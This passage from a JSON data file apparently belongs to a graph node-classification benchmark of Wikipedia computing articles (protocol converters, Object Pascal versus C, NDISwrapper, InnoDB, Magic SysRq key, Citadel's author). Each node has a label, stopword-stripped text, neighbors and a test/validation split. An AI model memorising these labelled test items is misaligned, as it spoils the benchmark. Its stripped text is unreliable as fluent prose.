      4257,
      8361,
      6317,
      8371,
      181,
      4278,
      10424,
      193,
      8407,
      4312,
      4317,
      8415,
      227,
      4328,
      2289,
      4337,
      6387,
      6390,
      4343,
      8444,
      6404,
      4357,
      6405,
      6407,
      4361,
      6409,
      6415,
      279,
      4375,
      2333,
      8484,
      2342,
      6440,
      2347,
      8496,
      6449,
      10544,
      6452,
      4405,
      312,
      4409,
      10552,
      10554,
      320,
      4418,
      324,
      325,
      4422,
      4425,
      2383,
      4443,
      8542,
      10605,
      8570,
      2434,
      387,
      2436,
      8579,
      6535,
      2444,
      10639,
      400,
      6546,
      6547,
      10644,
      8601,
      2460,
      2469,
      4518,
      4524,
      8620,
      4527,
      6582,
      10679,
      4536,
      4540,
      2498,
      6594,
      8646,
      4551,
      10695,
      8650,
      2510,
      8663,
      477,
      481,
      4579,
      2540,
      4588,
      497,
      498,
      2565,
      8709,
      6696,
      4666,
      2622,
      6720,
      577,
      2633,
      4682,
      2642,
      4690,
      4693,
      599,
      2649,
      4698,
      606,
      4705,
      4706,
      4709,
      10855,
      8809,
      4716,
      625,
      2674,
      627,
      8819,
      629,
      8823,
      4730,
      8830,
      4739,
      6792,
      2697,
      8840,
      10895,
      4758,
      4759,
      2718,
      4766,
      2722,
      680,
      6824,
      682,
      10931,
      695,
      2743,
      8887,
      4796,
      703,
      2753,
      707,
      8900,
      4818,
      2771,
      6867,
      2776,
      6872,
      8925,
      2792,
      6889,
      748,
      8942,
      10999,
      4856,
      8953,
      768,
      770,
      2822,
      11015,
      6923,
      786,
      6931,
      4894,
      801,
      2856,
      6956,
      2861,
      9005,
      11053,
      11061,
      4924,
      6976,
      2898,
      4946,
      11096,
      861,
      2918,
      7015,
      4973,
      7023,
      885,
      2933,
      9081,
      4991,
      7041,
      9091,
      11139,
      9093,
      5001,
      907,
      2956,
      7051,
      11148,
      11151,
      5009,
      5011,
      5014,
      919,
      9110,
      9120,
      7079,
      9137,
      2994,
      952,
      11194,
      958,
      7108,
      9161,
      972,
      973,
      3020,
      5068,
      7116,
      9166,
      3029,
      983,
      11231,
      994,
      5091,
      11234,
      11238,
      9191,
      1002,
      1003,
      3069,
      11261,
      7167,
      3074,
      3075,
      5124,
      9219,
      5127,
      5128,
      9247,
      5152,
      1060,
      9254,
      1063,
      3113,
      11311,
      1084,
      3136,
      11346,
      9303,
      9310,
      1120,
      9322,
      11373,
      7283,
      11380,
      1141,
      11384,
      5263,
      3217,
      5265,
      7314,
      9363,
      5275,
      11421,
      1183,
      1194,
      11443,
      1204,
      3256,
      11448,
      3258,
      11452,
      3266,
      1220,
      3268,
      11460,
      11462,
      9417,
      1226,
      1228,
      11471,
      5333,
      11478,
      1241,
      5340,
      11487,
      1248,
      3307,
      9453,
      5359,
      3325,
      11518,
      11522,
      3346,
      3348,
      5400,
      1311,
      11557,
      9516,
      1326,
      5422,
      11575,
      5436,
      1345,
      3396,
      3406,
      5458,
      1370,
      9566,
      3436,
      7536,
      1403,
      5502,
      11666,
      9627,
      5538,
      7586,
      7591,
      5544,
      11690,
      5548,
      9651,
      5556,
      9652,
      7610,
      9659,
      9662,
      9673,
      9674,
      3536,
      3543,
      7651,
      9703,
      5610,
      1515,
      7661,
      9716,
      1527,
      5628,
      7679,
      1543,
      1564,
      9762,
      1571,
      3622,
      3623,
      7719,
      1596,
      5692,
      1599,
      7758,
      5717,
      1626,
      7773,
      9822,
      3679,
      7782,
      5735,
      5753,
      9849,
      9853,
      5762,
      1679,
      7832,
      3762,
      1720,
      5820,
      9917,
      5828,
      3787,
      3788,
      5839,
      3793,
      1753,
      5851,
      9947,
      3806,
      5854,
      1763,
      9957,
      1773,
      1776,
      7922,
      5882,
      1787,
      9998,
      3855,
      10010,
      7966,
      10018,
      7976,
      7983,
      5942,
      1854,
      8010,
      3915,
      3917,
      10064,
      10066,
      8027,
      8034,
      10093,
      3957,
      8062,
      6030,
      8081,
      6053,
      1958,
      6077,
      1984,
      10178,
      4043,
      10188,
      6096,
      8151,
      6109,
      8163,
      6121,
      10217,
      4077,
      2032,
      4082,
      8184,
      10234,
      4093,
      4094
    ],
    "mask": "None"
  },
  {
    "node_id": 9007,
    "label": 3,
    "text": "Protocol_converter:protocol converter protocol converter device used convert standard proprietary protocol one device protocol suitable device tools achieve interoperability protocols software installed routers convert data formats data rate protocols one network protocols network data navigating varieties protocols used different fields like power generation transmission distribution oil gas automation utilities remote monitoring applications major protocol translation messages involve conversion data messages events commands time synchronization general architecture protocol converter includes internal master protocol communicating external slave devices data collected used update internal database converter external master requests data internal slave collects data database send external master different schemes handling spontaneous reporting events commands different physical medium communication protocol-x include rs-232 rs-485 ethernet etc protocol converter applications vary industry industry protocol converter software converter hardware converter integrated converter depending protocols major protocols used area application listed list automation protocols protocol converters generally used transforming data commands one device application another necessarily involves transformation data commands representation encoding framing achieve conversion simple complex types conversions depending application domain used simplest commonly used conversion protocol conversion modbus rtu modbus tcp conversion change overall framing hence easy take serial modbus rtu frame encapsulate tcp/udp socket send ethernet since protocol framings except actual physical layer transmission application layers interpret data similarly long communication interfaces made transparent however exist complex conversions example data formatted data types supported object models etc different conversion engine needs make modifications framing mapping information type data command cases object models also might user configurations required defining mapping supported non-supported data types transformations however bring conversion advantages communication delay processing latency overall end end processing time finite needs considered solution designs latency end-to-end communication depends processing delay hardware and/or software used protocol conversion complexity solution architecture latencies vary typical industrial energy automation applications 10—20 milliseconds high 1 second solution architectures using protocol converters need consider latency impact project converters considered also majority architectures would involve configuration mapping require considerable engineering effort engineering time need considered defining project schedules",
    "neighbors": [
      4546,
      10924,
      11413
    ],
    "mask": "Test"
  },
  {
    "node_id": 9008,
    "label": 9,
    "text": "Comparison_of_Object_Pascal_and_C:comparison object pascal c computer programming languages c object pascal similar times origin influences purposes used design compile compilers early lifetimes c pascal old programming languages original pascal definition appeared 1969 first compiler 1970 first version c appeared 1972 c n't change much time pascal evolved lot nowadays vast majority pascal programming done modern object pascal old procedural pascal old procedural pascal today essentially limited microcontroller programming tools mikropascal object pascal main dialect used tools delphi lazarus ide free pascal documented modern object pascal used free pascal delphi c documented c99 standardized 1999 syntactically object pascal much algol-like c. english keywords retained c uses punctuation symbols — pascal codice_1 codice_2 codice_3 c uses codice_4 codice_5 codice_6 example however c actually algol-like pascal regarding simple declarations retaining type-name variable-name syntax example c accept declarations start block outer block function another subtle difference role semicolon pascal semicolons separate individual statements within compound statement whereas terminate statement c. also syntactically part statement c transforming expression statement difference manifests primarily two situations superfluous semicolon put last line end thereby formally inserting empty statement traditional c codice_9 since c99 also codice_10 object pascal codice_11 codice_12 codice_13 c pascal differ interpretation upper lower case c case sensitive pascal thus codice_14 codice_15 distinct names c identical pascal languages identifiers consist letters digits rule first character may digit c underscore counts letter even _abc valid name names leading underscore often used differentiate special system identifiers c. pascal also accepts character part identifiers difference c. c pascal use keywords words reserved use language examples const goto keywords happen common languages c basic built-in type names also keywords e.g int char combinations keywords e.g unsigned char pascal built-in type names predefined normal identifiers recent object pascal compilers however allow escape keywords feature mainly need directly communication foreign oop systems like com cocoa might use fields methods based pascal keywords c way escape keywords pascal procedure definitions start keywords procedure function type definitions type c function definitions determined syntactical context type definitions use keyword codice_16 languages use mix keywords punctuation definitions complex types instance arrays defined keyword array pascal punctuation c enumerations defined keyword codice_17 c punctuation pascal pascal functions begin end delimit block statements proper c functions use delimit block statements optionally preceded declarations c prior c99 strictly defines declarations must occur statements within particular block allows blocks appear within blocks way go around pascal strict declarations must occur statements allows definitions types functions variable declarations encapsulated function definitions level depth grammars languages similar size implementation perspective main difference two languages parse c necessary access symbol table types pascal one construct assignment instance c fragment codice_18 could declaration codice_19 object whose type pointer codice_20 statement-expression multiplies codice_20 codice_19 corresponding pascal fragment codice_23 unambiguous without symbol table pascal requires variable function declarations specify type explicitly traditional c type name may omitted contexts default type codice_24 corresponds codice_25 pascal implicitly assumed however defaults considered bad practice c often flagged warnings c accommodates different sizes signed unsigned modes integers using modifiers codice_26 codice_27 codice_28 codice_29 etc exact meaning resulting integer type machine-dependent however guaranteed codice_30 shorter codice_24 codice_24 shorter codice_33 however c standard least minimal sizes types specified guarantees codice_34 single byte codice_24 least two bytes pascal similar end performed declaring subrange integer compiler may choose allocate smaller amount storage declared variable subrange feature supported c. major subtle difference c pascal promote integer operations pascal operations integers integer subranges effect operands promoted full integer c defined rules promote different types integers typically resultant type operation two integers precision greater equal precisions operands make machine code generated c efficient many processors highly optimizing pascal compiler reduce eliminate effect standard pascal rules pre-standard implementation c well small-c et al allowed integer pointer types relatively freely intermixed c character type codice_34 kind integer longer codice_33 expressions codice_38 therefore perfectly legal declarations codice_39 codice_40 integer nature codice_34 eight-bit byte machines clearly illustrated declarations whether codice_34 type regarded codice_28 codice_29 default implementation pascal characters integers distinct types inbuilt compiler functions codice_45 codice_46 used typecast single characters corresponding integer value character set use vice versa e.g systems using ascii character set codice_47 codice_48 tab character addition codice_49 type object pascal also codice_50 represent unicode characters c usually implemented macro codice_16 name codice_52 simply alias codice_24 pascal boolean enumerated type possible values boolean false true ordinal value false=0 true=1 values undefined conversion integer ord used standard function integer boolean however conversion simple practice c binary valued relational operators == may regarded boolean sense always give results either zero one tests || etc performed zero-checks false represented zero true represented value interface com object pascal added codice_54 codice_55 codice_56 type whose size respects prefix follow c truth table free pascal added proper pascal boolean types size suffix codice_57 interface glib uses codice_58 32-bit boolean type pascal truth table c programmer may sometimes use bitwise operators perform boolean operations care needs taken semantics different operands make use one bit represent value pascal another abstract high level method dealing bitwise data sets sets allow programmer set clear intersect unite bitwise data values rather using direct bitwise operators example pascal c although bit operations integers operations sets considered similar sets implemented using bits direct parallel uses unless non-standard conversion integers sets possible pascal could also bitwise operations exactly way c use codice_1 codice_2 codice_61 codice_62 operators operators normally work booleans operands integers behave bitwise operators made possible boolean integer distinct incompatible types therefore c code could written pascal c string remains pointer first element null-terminated array char 1972 one still use library support codice_63 manipulate strings object pascal many string types new type introduced old one kept backwards compatibility happened twice delphi 2 introduction ansistring delphi 2009 unicodestring besides main string types short- ansi- wide- unicodestring corresponding character types ansichar widechar=unicodechar types derived character type string properties pointer char array char dynamic array char pointer array char etc. object pascal codice_64 compiler-managed type reference-counted i.e. storage management handled compiler accurately runtime code inserted compiler executable string concatenation done codice_65 operator string comparison done standard relational operators case sensitive codice_66 object pascal also provides c-compatible strings type codice_67 manipulation routines defined codice_68 unit moreover object pascal provides wide variety string types convenience plain codice_76 type provided depending compiler switch could mean codice_69 codice_71 codice_74 additional convention used limit number characters given codice_69 otherwise codice_81 codice_82 strings freely intermixed manipulating strings compiler silent conversion required note target string type codice_69 silent truncation might happen due maximum length allowed example c real concept array pseudo construct declare storage multiple variables type arrays c n't know length 're referenced pointer first element 're always 0 based example get array length one calculate codice_84 therefore count length integer array use codice_85 common mistake calculate function expecting array argument despite appearance function accept pointer argument real array therefore inside function array treated plain pointer example common solution problem always pass array length function argument functions expect array argument also provide placeholder length despite treatment pointer pointer style constructs could used array example code would compile fine would cause access violation executed care taken designing code documentation explicitly state prevent users mistake assignment static arrays n't allowed one must use codice_86 function variants copy data arrays pascal array declared using codice_87 keyword specifying lower upper bound base type latter usually defined range type example arrays know upper lower bounds implicitly length bounds passed along function expects array argument functions codice_88 codice_89 codice_90 retrieve lower bound upper bound array length respectively context without explicit cast arrays ca n't wo n't converted pointers compile time error property type-safe programming assignment static arrays allowed assignment copies items source array destination mandatory upper lower bounds compatible source destination somehow 're different one use codice_91 partially copy data however since codice_91 low-level function one must use care programmer responsibility ensure data movement exceeds neither destination source boundary example c language support declaring using dynamic arrays however due pointer dereference syntax dynamic array could implemented memory management functions usually codice_93 example seen length n't maintained automatically reallocation use additional variable protect enough memory error assignment dynamic arrays follows pointer assignment rule object pascal provides language-level support dynamic arrays declared lower upper bound omitted one must call codice_94 function allocate storage dynamic arrays object pascal reference counted one n't worry freeing storage dynamic arrays always zero-based three functions codice_88 codice_89 codice_90 would still retrieve lower bound upper bound array length correctly example assignment dynamic arrays copies reference source array destination real copy required one use codice_98 function example",
    "neighbors": [
      512,
      1145,
      1931,
      6414,
      10510,
      6160,
      5521,
      8082,
      11411,
      5399,
      3736,
      1435,
      155,
      6558,
      5663,
      10143,
      5796,
      428,
      2605,
      5165,
      5806,
      3765,
      7479,
      10043,
      10684,
      8510,
      6338,
      963,
      8262,
      5961,
      1610,
      1611,
      8524,
      4173,
      8397,
      9804,
      11212,
      11219,
      5588,
      7894,
      4057,
      10586,
      8545,
      4069,
      10470,
      7274,
      6640,
      4341,
      1016,
      3577,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9009,
    "label": 2,
    "text": "NDISwrapper:ndiswrapper ndiswrapper free software driver wrapper enables use windows xp network device drivers devices pci cards usb modems routers linux operating systems ndiswrapper works implementing windows kernel ndis apis dynamically linking windows network drivers implementation result works systems based instruction set architectures supported windows namely ia-32 x86-64 native drivers network adapters available linux manufacturers maintain proprietary interfaces write cross-platform drivers ndiswrapper allows use windows drivers available virtually modern pc network adapters three steps creating linux driver installing using ndiswrapper composed two main parts command-line tool used installation time windows subsystem used application calls wi-fi subsystem outcome ndiswrapper installation sort linux driver able work linux applications first action user compile couple windows files ndiswrapper version windows ddk linux kernel module done tool named ndiswrapper resultant linux driver installed often manually os linux application send request linux driver automatically needed adaptations call its—now—internal windows driver ddk achieve compilation ndiswrapper requires least .inf .sys files invariably supplied parts windows driver example driver called mydriver files mydriver.inf mydriver.sys vendorid productid 0000:0000 ndiswrapper installs driver /etc/ndiswrapper/mydriver/ directory contains three files graphical frontends ndiswrapper ndisgtk ndisconfig allow ndiswrapper installed using graphical user interface rather console commands ndiswrapper enables unix-like system use windows drivers type ndis wifi useful time linux wi-fi drivers common wi-fi cards composed ndiswrapper uses windows inf files linux application calls device registered linux ndiswrapper device ndiswrapper determines windows driver targeted converts linux query windows parlance calls windows driver waits result translates linux parlance sends result back linux application possible linux driver ndiswrapper linux driver call windows driver execute address space linux kernel windows driver composed layered drivers example one ethernet one usb upper layer driver called upper layer create new calls irp windows parlance calling mini ntoskrnl mini ntoskrnl must know drivers must registered internal database priori reading windows .inf files",
    "neighbors": [
      5380,
      1927,
      274,
      9625,
      1946,
      4636,
      2212,
      10535,
      7983,
      11570,
      11698,
      11573,
      1718,
      823,
      5177,
      5819,
      11459,
      8266,
      8395,
      1617,
      850,
      7249,
      10451,
      10455,
      6361,
      9306,
      4571,
      6491,
      10079,
      7521,
      8161,
      1891,
      1637,
      998,
      4073,
      5356,
      5358,
      9201,
      3058,
      7027,
      9844,
      2421,
      2424,
      1273,
      8445,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 9010,
    "label": 1,
    "text": "InnoDB:innodb innodb storage engine database management system mysql mysql 5.5 december 2010 later use default replacing myisam provides standard acid-compliant transaction features along foreign key support declarative referential integrity included standard binaries distributed mysql ab exception oem versions innodb became product oracle corporation acquisition finland-based innobase oy october 2005 software dual licensed distributed gnu general public license also licensed parties wishing combine innodb proprietary software innodb supports",
    "neighbors": [
      11392,
      1539,
      8195,
      10632,
      10258,
      10389,
      1817,
      7453,
      1950,
      9503,
      8353,
      8994,
      8871,
      10921,
      1707,
      7339,
      5677,
      7983,
      9012,
      10553,
      1594,
      10048,
      6721,
      6338,
      9665,
      6341,
      5964,
      5198,
      2130,
      7506,
      597,
      9687,
      1755,
      6107,
      2269,
      10459,
      1250,
      10340,
      6245,
      7654,
      8295,
      8683,
      5612,
      2413,
      7022,
      8434,
      3188,
      8181,
      4598,
      1399,
      10873,
      2810,
      2045,
      10367
    ],
    "mask": "Test"
  },
  {
    "node_id": 9011,
    "label": 9,
    "text": "Mobile_Service_Architecture:mobile service architecture mobile service architecture msa jsr 248 specification describes end-to-end wireless environment java msa includes full set 16 jsrs subset 8 jsrs msa subset includes following jsrs msa includes msa subset following jsrs",
    "neighbors": [
      4358,
      9350,
      910,
      10526,
      2215,
      5031,
      5677,
      690,
      5810,
      8882,
      5943,
      6074,
      10683,
      6589,
      5567,
      9665,
      6860,
      3920,
      3416,
      992,
      4960,
      2658,
      3560,
      3561,
      3562,
      5872,
      9078,
      3705,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9012,
    "label": 7,
    "text": "Oracle_WebCenter:oracle webcenter oracle webcenter oracle portfolio user engagement software products built top jsf-based oracle application development framework three main products make webcenter portfolio purchased together suite individually products separate connected markets webcenter content competes enterprise content management market webcenter sites competes web experience management market webcenter portal competes self-service portal content delivery market space different combinations products frequently used together oracle bundled together within webcenter product family oracle webcenter contains set components building rich web applications portals team collaboration/social sites oracle webcenter targeted enterprise larger accounts significant content management requirements need deliver information internal external portals customer-facing websites within integrated business applications oracle made particular effort integrate webcenter leading business applications e-business suite peoplesoft jd edwards content centrally managed one location shared across multiple applications development community advanced business users webcenter provides development environment includes webcenter framework webcenter services along out-of-the-box application team collaboration enterprise social networking according oracle strategic portal product eventually replacing oracle portal well portal products acquired bea product costs 70000 per cpu webcenter services 125,000 per cpu webcenter suite production installation users expect deploy least 4 cpus base system likely additional cpus development testing webcenter includes embedded us licenses oracle secure enterprise search oracle universal content management oracle bpel process manager addition webcenter needs database store information supported licensed database oracle database ms sql server ibm db2 work three major products webcenter product stack base webcenter framework allows user embed portlets adf taskflows/pages content customizable components oracle adf application framework pieces integrated oracle jdeveloper ide providing access resources webcenter services set independently deployable collaboration services incorporates web 2.0 components content collaboration communication services full list provided webcenter services includes oracle adf user interface components called taskflows embedded directly adf applications addition apis utilized create custom uis integrate services non-adf applications finally webcenter spaces closed source application built webcenter framework services offers prebuilt project collaboration solution compared solutions like microsoft sharepoint atlassian confluence limited mechanisms extend application note product called webcenter interaction built core webcenter stack former plumtree portal product also oracle portal products oracle included webcenter suite umbrella products products included suite regardless whether built adf based webcenter framework webcenter comprises furthermore several editions among others webcenter suite plus webcenter portal webcenter content webcenter sites webcenter sites satellite server distributed caching mechanism stores assembles pagelets elements output webcenter universal content management seven webcenter adapters one wce management available social networking services enables users maximize productivity collaboration shared services provides features social networking personal productivity personal productivity services focuses requirements individual rather group webcenter framework supports following standards 22 february 2012 oracle released webcenter 11g release 1 patch set 5 includes many bug fixes addition several new enhancements patch set mainly targeted releasing customer bug fixes january 2011 oracle released webcenter 11g release 1 patch set 3 converged portal platform major new release many features integrated previously acquired portal products including greatly improved flexible portal framework improved gui personalization server brand new navigation model support hierarchical pages spaces jsr 286 improved performance webcenter framework services lacks support notable technologies",
    "neighbors": [
      1539,
      11030,
      10526,
      8353,
      8994,
      8871,
      1707,
      5677,
      9010,
      10553,
      1594,
      9665,
      6338,
      6341,
      6993,
      597,
      2901,
      6107,
      1755,
      2269,
      6366,
      1250,
      10340,
      3560,
      7022,
      8434,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 9013,
    "label": 3,
    "text": "Palm_IIIx:palm iiix palm iiix pda palm computing released 1999 briefly scaled palm iiie introduced marketplace palm iiix improved upon palm iii featuring new enhanced easier read lcd 4 mb ram opposed 2 mb palm iii palm iiix also 16 mhz motorola dragonball ez cpu faster along claims efficient 16 mhz motorola dragonball cpu found previous palm models palm iiix featured new inverse electroluminescent backlight illuminated screen text instead screen background new feature area controversy many people disliked feature many found improvement palm iiix shipped palm os 3.1 including many fixes previous version palm os 3.0 palm iiix also featured expansion slot inside casing slot could accommodate 3rd party upgrade card expand palm iiix functionality storage ability model suffered design defect cpu wherein date would often fail change midnight especially batteries fresh os upgrade last palm os downloaded www.palm.com website 3.3 however last os iiix 4.1 bought time came cd cds discontinued bit hard find",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      694,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      2420,
      8952,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 9014,
    "label": 8,
    "text": "W3Perl:w3perl w3perl free software logfile analyser parse web/ftp/mail/cups/dhcp/ssh squid logfiles major web logfile formats supported web clf/eclf/neclf unix iis/w3c microsoft mail postfix/sendmail/exim well split/compressed files page tagging counter also supported logfiles access output spread html pages graphics sortable table stats run single command line web browser essential features like hosts pages scripts countries filetype traffic hourly daily weekly monthly referrer user agent error available along specific w3perl stats like real-time session stats w3perl administration interface allows building configuration files web interface one also manage configuration files package updates run scripts see stats output written perl w3perl installed operating system supports perl installed unix windows mac os x installer available windows mac os x. w3perl licensed gnu gpl running scripts administration interface restricted login/password blocking referrer spam added based blacklist file must updated regularly real-time stats run prevent overloading server",
    "neighbors": [
      5249,
      5253,
      8582,
      3988,
      1943,
      4640,
      10276,
      6313,
      1837,
      4398,
      7983,
      6576,
      4294,
      7764,
      4439,
      11610,
      7518,
      865,
      11492,
      2281,
      5612,
      8941,
      3837
    ],
    "mask": "None"
  },
  {
    "node_id": 9015,
    "label": 1,
    "text": "Swedish_Open_Cultural_Heritage:swedish open cultural heritage soch swedish open cultural heritage web service used searching retrieving data museum historical environment sectors sweden soch aggregate metadata different central regional local databases order facilitiate applications search present cultural heritage data via open api aim facilitate application developers build applications exploit soch march 2013 +10 different applications built using soch api one first applications built soch mobile phone application displaying ancient monuments map layer number museums also building applications soch order make stuff available online 2012 commercial applications started appear using soch data soch operated developed swedish national heritage board snhb snhb used soch api applications http //www.kringla.nu http //www.platsr.se",
    "neighbors": [
      10020,
      2901,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9016,
    "label": 2,
    "text": "Magic_SysRq_key:magic sysrq key magic sysrq key key combination understood linux kernel allows user perform various low-level commands regardless system state often used recover freezes reboot computer without corrupting filesystem effect similar computer hardware reset button power switch many options much control key combination provides access powerful features software development disaster recovery sense considered form escape sequence principal among offered commands means forcibly unmount file systems kill processes recover keyboard state write unwritten data disk respect tasks feature serves tool last resort magic sysrq key work certain conditions kernel panic hardware failure preventing kernel running properly key combination consists another key controls command issued may released pressing command key long remains held combinations always assume qwerty keyboard layout example dvorak simplified keyboard combination shut system uses key instead furthermore keyboards may provide separate key case separate key present devices notably laptops key may need pressed use magic key e.g thinkpad carbon x1 activated pressing simultaneously releasing still holding see magic sysrq key may also accessible serial console sending rs-232 break signal sysctl option set allow user space programs command line shell sysrq may accessed writing e.g. common use magic sysrq key perform safe reboot linux computer otherwise locked abbr reisub prevent required reboot gives programs chance save emergency backups unsaved work qwerty azerty mnemonics raising elephants utterly boring reboot even system utterly broken simply word busier read backwards often used remember following sysrq-keys sequence magic keys used kill frozen graphical program program chance restore text mode make everything unreadable commands part svgalib command restore text mode make console readable distributions include command key command may sometimes able force return text console use ... n highest number text consoles set distribution would normally used reenter gui mode system x server crashed also distributions opens text consoles reenter gui mode reenter gui mode login page order log another user feature controlled compile-time option kernel configuration sysctl kernel parameter newer kernels since 2.6.12 possible fine-grained control magic sysrq key used machines number written 0 1 number greater 1 bitmask indicating features allow ubuntu set boot time value defined magic sysrq key originally implemented part kernel keyboard handler debugging functionality also exposed via proc filesystem commonly used provide extended management capabilities headless remote systems linux daemons provide method accessing sysrq features tcp connection authenticating plain-text password daemon invoke pre-configured sysrq triggers system load average exceeds certain threshold xen hypervisor functionality send magic commands hosted domains via command additionally sysrq command invoked xen paravirtual console sending break sequence followed desired key many embedded systems attached keyboard instead use serial console text input/output running system possible invoke magic sysrq feature serial console sending serial break followed desired key method sending break dependent terminal program hardware used connect serial console chromebooks keyboard dedicated sysrq key use instead however keys different function ibm power systems servers invoke magic sysrq feature using followed desired key hardware management console ibm mainframe partitions invoke magic sysrq feature using followed desired key 3270 hmc console",
    "neighbors": [
      9665,
      2594,
      8418,
      5988,
      4581,
      1509,
      8036,
      3323,
      5106,
      9970,
      8852,
      11221,
      11444,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 9017,
    "label": 0,
    "text": "Spoken_dialog_systems:spoken dialog systems spoken dialog system computer system able converse human voice two essential components exist written text dialog system speech recognizer text-to-speech module written text dialog systems usually use input systems provided os distinguished command control speech systems respond requests attempt maintain continuity time spoken dialog systems vary complexity directed dialog systems simple require developer create graph typically tree manages task may correspond needs user information access systems typically based forms allow users flexibility example order retrieval constraints specified use optional constraints limited capabilities problem-solving dialog systems may allow human users engage number different activities may include information access plan construction possible execution latter examples systems include pionieers dialogue systems companies like speech recognizer system seventies cselt laboratories led european research projects eighties e.g sundial end darpa project us field spoken dialog systems quite large includes research featured scientific conferences sigdial interspeech large industrial sector meetings speechtek avios following might provide good technical introductions",
    "neighbors": [
      2440,
      10557
    ],
    "mask": "Test"
  },
  {
    "node_id": 9018,
    "label": 9,
    "text": "Cynbe_ru_Taren:cynbe ru taren jeffrey prothero march 15 1956–november 16 2016 american computer programmer author citadel arguably first virtual world system one longest-running open source projects digital anatomist software better known visible human project original pascal strek.pas star trek game program first loglan parsers mythryl production-grade port sml/nj prothero used screenname cynbe ru taren online cynbe ru taren name fictional alien poul anderson 1964 science fiction novel star fox sbn 425-03772-x novel cynbe ru taren aleriona intellect master garden war fleet admiral military strategist grand commission negotiators died november 16 2016 battle colorectal cancer prothero born march 15 1956 london ontario academic parents john jack joyce prothero attended kindergarten ontario first form london england second form cambridge england third grade boston massachusetts fourth twelfth seattle washington prothero lived seattle programming designing virtual worlds 1997 moved austin texas live wife allucquere rosanne stone professor university texas austin beginning 1998 prothero stone divided time santa cruz tahoe city california maintaining residence austin school sessions prothero enrolled university washington 1974 spending time campus computer center learned craft visual techniques laboratory using pdp10 mohawk data 600lpm printer long working full-time programmer department biological structure headed john w. sundsten john prothero wrote skandha visualization system assembled microscopic sections biological material three-dimensional images could manipulated minutely reveal details interior objects human body biological structure department named effort digital anatomist project image database supplied raw digital material wolfgang rauschning swedish researcher microtomy microscopy specialized producing ultrathin tissue cross-sections rauschning method subtractive ablating layer carefully frozen tissue thousand molecules thick coating exposed surface glycerol mixture rauschning adapted specific tissue photographing surface high resolution repeating tissue completely sectioned rauschning sent image via internet digital anatomist database university washington seattle method produced extremely high resolution digital images vivid color almost none distortion would normally caused displacement forces generated action conventional microtome extreme thinness settings sundsten jeffrey prothero john prothero asked rauschning include fiduciaries sections enabled prothero skandha 3d visualization software assemble huge digital database three-dimensional flythrough-capable anatomical images extremely fine grain group made prothero tapes 3d reconstructions freely available website hearing work national library medicine issued call proposals national 3d anatomical reconstruction database would later become visible human project astonishment digital anatomist group found university colorado made strong bid contract using prothero ’ data tapes examples work technically nothing illegal since tapes freely available colorado bid mention provenance colorado contract continued display prothero ’ work without attribution first three years contract although later work based methodology developed digital anatomist project colorado specimen sectioning system involved something rather like bandsaw produced considerably coarser-grained reconstructions shortly afterward chief scientists uw digital anatomist project resigned frustration 1980 prothero completed building second computer heath h89 homebrew power supply silent 700 acoustic coupler began writing code december 14 released first version citadel december 24 first release used phone number connected hardware prothero study first call program citadel instead named ode phone number acronym ode-data later changed odd-data suggestion friends version citadel released december 24 1980 written c fast responsive self-maintaining ran 90kb floppy disc world consisted collection rooms connected “ clues ” since rooms invisible clue included name clued room part clue details citadel room architecture see citadel software page details citadel program architecture see even early stage new social forms enabled citadel system allowed users display aberrant antisocial behavior well-known among virtual world researchers including griefing unresolvable arguments misreadings innocuous remarks resulting flame wars hardware problems finally brought system prothero felt enough peacekeeping wanted concentrate programming consequently passed software system david mitchell friend lived bainbridge island washington far prothero ’ home system mitchell acquired went become canonical citadel april 1982 prothero released citadel v.2.11 c users group mailing list social experiment distribute power broadly v.2.1.1 provided class people neither sysadmins users partial sysadmin powers afford measure accountability actions produced unerasable paper trail v.2.11 also implemented secure database encrypting disc using simple xor hash prothero continued make innovations citadel software moving projects prothero posted citadel source code rcp/m archive network 1990 code cited one longest running open source projects",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9019,
    "label": 9,
    "text": "Lawrence_M._Breed:lawrence m. breed lawrence larry moser breed born july 17 1940 computer scientist artist inventor best known involvement programming language apl undergraduate stanford university 1961 created first computer animation language system used stanford football half-times coordinate images produced 100 ft-by-100 ft array rooters holding colored cards graduate student stanford corresponded apl inventor ken iverson correct formal description ibm system/360 used iverson notation receiving m.s stanford 1965 academic supervisor niklaus wirth joined iverson group ibm thomas j. watson research center yorktown heights new york created first implementation apl philip s. abrams mainframe computer ibm 7090 1965 later created apl implementations experimental ibm little computer ibm 360 1966 ibm 1130 breed 1973 recipient dick lathwell roger moore grace murray hopper award association computing machinery work design implementation apl\\360 setting new standards simplicity efficiency reliability response time interactive systems dan dyer others co-founded scientific time sharing corporation 1969 led development apl plus time-sharing system 1972 francis bates iii wrote one world first worldwide email systems named mailbox breed rejoined ibm 1977 helped develop international organization standardization iso apl standard joined ibm efforts port berkeley software distribution bsd unix onto ibm platforms worked compilers programming language c floating-point arithmetic standardization radix conversion retiring 1992 breed became significant contributor burning man festival playa name ember conceived built first trash fence capture windborne debris created spiraling flaming sculpture chaotick built artistic bicycle light effects edited proofread black rock gazette newspaper role continues co-founder director successor black rock beacon burning man materials earth guardian promoted leave trace ethos particularly post-event cleanup 1973 1974 took first place co-solver donna breed dictionary rally associated burning man activities breed devised gray-b-gon evaporator graywater disposal bay area workshops directed construction burning man campers 100 units 2012",
    "neighbors": [
      9993,
      10508,
      10008,
      1178,
      667,
      8987,
      1952,
      1316,
      10668,
      4921,
      9151,
      3267,
      1099,
      9804,
      1613,
      7630,
      1236,
      2519,
      1883,
      11099,
      7775,
      9825,
      11625,
      4331,
      2670,
      2798,
      5492,
      8695,
      505,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9020,
    "label": 3,
